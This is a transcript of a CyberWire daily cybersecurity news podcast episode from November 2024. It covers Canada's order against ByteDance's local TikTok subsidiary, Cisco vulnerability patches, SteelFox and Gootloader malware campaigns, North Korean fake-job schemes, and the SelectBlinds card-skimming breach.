
Canada cuts TikTok ties.
Canada orders ByteDance to shut down local operations. Cisco releases urgent patches for multiple vulnerabilities. SteelFox malware delivers a crypto-miner and info-stealer. North Korean campaigns pursue fake jobs and remote workers. A suspected cyber intrusion disrupts Washington state court systems. Over 200,000 customers of SelectBlinds have their credit card info stolen. Cyber experts encourage congress to pursue bipartisan readiness studies despite DoD pushback. On our Industry Voices segment, we welcome guest Jeremy Huval, Chief Innovation Officer at HITRUST®, discussing the AI explosion and the need to consider the risks before implementation. Curiosity killed the cat lover’s computer.
Today is Thursday November 7th 2024. I’m Dave Bittner. And this is your CyberWire Intel Briefing.
Canada orders ByteDance to shut down local operations.
Canada has ordered ByteDance, the owner of TikTok, to close its Canadian subsidiary, TikTok Technology Canada, Inc., which will result in shutting down offices in Toronto and Vancouver. Announced on November 6 by François-Philippe Champagne, Canada’s Minister of Innovation, Science, and Industry, the decision follows a national security review under the Investment Canada Act, aimed at mitigating risks from foreign investments. The Canadian government cited concerns over potential security threats tied to ByteDance’s connections with the Chinese government. Despite the subsidiary’s closure, the TikTok app remains accessible in Canada, with the government encouraging users to adopt strong cybersecurity practices. ByteDance criticized the decision, saying it would impact hundreds of Canadian jobs and announced plans to challenge the order in court. This move aligns with similar actions by the U.S. and EU, which have restricted TikTok over national security concerns.
Cisco releases urgent patches for multiple vulnerabilities.
Cisco released patches for multiple vulnerabilities in its enterprise products, including a critical flaw (CVE-2024-20418) in its Unified Industrial Wireless software, scoring a perfect 10/10 on the CVSS scale. This vulnerability allows unauthenticated attackers to inject commands with root access via the web-based management interface on affected devices, including the Catalyst IW9165D, IW9165E, and IW9167E access points. Users are advised to update to version 17.15.1 to mitigate the risk.
Additionally, Cisco fixed a high-severity bug (CVE-2024-20536) in the Nexus Dashboard Fabric Controller, which could be exploited for SQL injection, and another high-severity flaw (CVE-2024-20484) in Enterprise Chat and Email that could lead to denial-of-service (DoS). Cisco addressed nearly two dozen other medium-severity issues, affirming that none of the vulnerabilities have been exploited in the wild.
Cisco has also identified a vulnerability (CVE-2024-20445) in its Desk Phone 9800, IP Phone 7800 and 8800, and Video Phone 8875 series that could allow remote attackers to access sensitive data like call records if the Web Access feature is enabled. This flaw, due to improper handling of sensitive information in the web UI, can be exploited by browsing the device’s IP address. Although Web Access is off by default, Cisco has issued patches to secure affected devices and advises users to apply updates promptly.
SteelFox malware delivers a crypto-miner and info-stealer.
The malware bundle “SteelFox” has been impersonating legitimate software, like Foxit PDF Editor and AutoCAD, to steal user information since early 2023. Distributed through torrents, forums, and blogs, SteelFox delivers both a cryptocurrency miner and an information-stealing component. It installs via fake “cracks” of popular software, requesting administrator privileges during installation to later exploit them for malicious purposes. SteelFox uses a vulnerable driver to escalate its privileges, making its processes hard to terminate. The malware collects extensive user data, including browser history, cookies, location, and system details, packaging it in a JSON file and sending it to a command-and-control server. Kaspersky reports victims worldwide and advises users to download software only from official sources and use robust security measures to avoid similar threats.
North Korean campaigns pursue fake jobs and remote workers.
Hackers are increasingly exploiting vulnerabilities among remote workers, often using tactics like “vishing” to impersonate IT staff and steal sensitive information. Recently, Zscaler uncovered two North Korean campaigns, “Contagious Interview” and “WageMole,” aimed at bypassing financial sanctions by securing remote jobs under false identities. The Contagious Interview campaign lures developers with fake job postings, infecting them with JavaScript-based malware BeaverTail and Python-based InvisibleFerret, which exfiltrates data via encrypted HTTP protocols. This malware targets developers on Windows, Linux, and macOS, affecting victims primarily in India, Pakistan, Kenya, and Nigeria.
Stolen identities from these attacks fuel the WageMole campaign, allowing operatives to land remote jobs in Western firms. These operatives use AI-generated documents, portfolios, and even voice-over tools to pass interviews, impersonating experienced developers. Zscaler advises companies to verify employment history, use virtual environments for suspicious files, and authenticate applicant identities to combat these tactics.
A suspected cyber intrusion disrupts Washington state court systems.
A suspected cyber intrusion has disrupted Washington state court systems this week, affecting multiple counties, including King, Pierce, and Thurston. The Washington State Administrative Office of the Courts (AOC) detected “unauthorized activity” on its network, leading to outages in public access to court services. While Pierce County reports minimal impact, some courts have suspended hearings and experienced issues with electronic filing and fine payment platforms. The AOC is working to secure systems and restore service but has not confirmed whether ransomware is involved. This incident follows a wave of cyberattacks on various U.S. court systems and other Washington state entities.
Over 200,000 customers of SelectBlinds have their credit card info stolen.
Hackers stole credit card and personal data from over 200,000 customers of home decor retailer SelectBlinds by embedding malware on the company’s website, allowing them to scrape data entered on the checkout page. Discovered in late September, the malware had been active since January, capturing usernames, passwords, credit card details, names, addresses, and emails. SelectBlinds has locked user accounts, requiring password changes, and removed the malware. The company advised customers to update reused passwords on other sites.
This attack is part of a broader trend where hackers use “e-skimmers” to inject malicious code into online checkout pages to siphon credit card data for sale on dark web markets.
Cyber experts encourage congress to pursue bipartisan readiness studies despite DoD pushback.
In a time of political division, bipartisan efforts to strengthen U.S. cybersecurity are at risk. Recently, the Defense Department opposed a proposal for an independent study on America’s cyber force readiness, even though this bipartisan initiative has backing across both congressional chambers. In an opinion piece for CyberScoop, Cybersecurity experts Colin Ahern, chief cyber officer of the State of New York, Erica Lonergan, assistant professor at Columbia University’s School of International and Public Affairs, and Mark Montgomery, retired rear admiral and senior director of the Center on Cyber and Technology Innovation at the Foundation for Defense of Democracies, emphasize that traditional physical barriers, like oceans, don’t shield the U.S. in cyberspace, where adversaries routinely infiltrate critical infrastructure, deploy malware, and gather sensitive data from government and private networks.
The proposed legislation seeks to evaluate whether the U.S. has the cyber personnel, strategy, and resources necessary to counter growing digital threats. It also explores creating a dedicated “Cyber Force,” similar to the Space Force, focused on recruiting and training cyber specialists. Given that much cyber expertise lies within the private sector, an independent study would explore how a Cyber Force could enhance collaboration between military and civilian sectors, federal and local governments, and public-private partnerships. Such a force could also support a cyber-specific National Guard and Reserve, offering flexibility and knowledge-sharing for high-stakes cyber defense.
The authors contend that the Defense Department’s resistance may stem from concerns about uncovering readiness deficiencies, as recruitment and training for cyber roles remain fragmented across military branches. This bureaucratic divide harms overall readiness, yet institutional interests often resist substantial change. Congress, they argue, should not bow to Defense Department pressure but instead move forward with the study to assess America’s force posture in cyberspace.
With threats escalating globally — including Chinese cyber incursions into U.S. infrastructure, Iranian attacks on water systems, and cyber warfare in Ukraine — the authors stress that the U.S. cannot afford to delay. An independent, transparent assessment would offer unbiased insights into the readiness and potential reforms needed to secure the nation against digital threats.
Coming up on our Industry Voices segment, I speak with HITRUST’s Chief Innovation Officer Jeremy Huval, about the AI explosion and the need to consider the risks before implementation. We’ll be right back.
Welcome back. You can find out more about HITRUST in our show notes.
Curiosity killed the cat lover’s computer.
In a curious case of cyber crooks targeting feline fans, Sophos reports that the Gootloader malware gang—typically laser-focused on high-value targets like banks—has turned its gaze toward an unusual group: Australian fans of Bengal cats. Yes, you heard that right. This infamous malware, known for sneaking onto systems via SEO-poisoned search results, has been spotted targeting folks simply curious about the legality of owning Bengal cats down under.
The story goes like this: Unsuspecting cat enthusiasts, innocently Googling “Are Bengal cats legal in Australia?” are met with booby-trapped search results. Sophos investigators found that clicking the top link led these curious minds straight to a ZIP file harboring Gootloader’s payload. From there, the malware initiates its devious plan, dropping a giant JavaScript file and establishing persistence with PowerShell commands. The endgame? Bringing out the heavy-hitters like Cobalt Strike and ransomware.
As bizarre as it seems, this cat-loving cyber caper reminds us just how far cybercriminals will go—and how important it is to think twice before downloading anything from that “helpful” forum post. It may be the purr-fect crime. I mean, talk about cat-phishing! We’re talking furr-bidden content. And that’s just scratching the surface. Let’s not get hiss-terical. I could do this all day, folks.
And that’s the CyberWire.
For links to all of today’s stories, check out our Daily Briefing at the cyberwire dot com.
We’d love to know what you think of this podcast. Your feedback ensures we deliver the insights that keep you a step ahead in the rapidly changing world of cybersecurity. If you like the show, please share a rating and review in your podcast app. Please also fill out the survey in the show notes or send an email to cyberwire@n2k.com
We’re privileged that N2K CyberWire is part of the daily routine of the most influential leaders and operators in the public and private sector, from the Fortune 500 to many of the world’s preeminent intelligence and law enforcement agencies.
N2K makes it easy for companies to optimize your biggest investment, your people. We make you smarter about your teams, while making your teams smarter. Learn how at n2k.com.
This episode was produced by Liz Stokes. Our mixer is Tré Hester, with original music and sound design by Elliott Peltzman. Our executive producer is Jennifer Eiben. Our executive editor is Brandon Karpf. Simone Petrella is our president. Peter Kilpe is our publisher, and I’m Dave Bittner. Thanks for listening.